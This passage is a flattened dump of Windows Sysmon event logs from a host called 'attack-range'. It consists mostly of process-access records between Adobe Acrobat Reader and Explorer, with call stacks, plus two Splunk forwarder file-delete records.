DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047588Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.236{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047587Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.236{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047586Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.190{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047585Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.190{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047584Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.143{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047583Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.143{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047582Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.096{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047581Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.096{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047580Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.049{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047579Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.049{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047578Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.002{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047577Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.002{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000018786Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:28.942{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6DD225A41B5B711CFD106AB70241CB7,SHA256=5DBA53926AFA29154511C6A16FCF8DC2A7E99951173543E17BBA7949C5B9DA20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000047652Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:28.832{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E760CFE1124B5C3C303724B2187F62EA,SHA256=D5DFDE4698D2A5668FF21250D36A64277CF3105BA98989A80CF85710D126CD09,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000047651Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:28.542{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002688C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\NPSMDesktopProvider.dll+1be4a|C:\Windows\System32\NPSMDesktopProvider.dll+1226e|C:\Windows\System32\NPSMDesktopProvider.dll+12835|C:\Windows\System32\NPSMDesktopProvider.dll+67dc|C:\Windows\System32\TwinUI.dll+7bfb8|C:\Windows\System32\TwinUI.dll+7559d|C:\Windows\System32\TwinUI.dll+75173|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047650Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:28.542{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047649Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:28.527{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047648Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:28.527{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047647Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 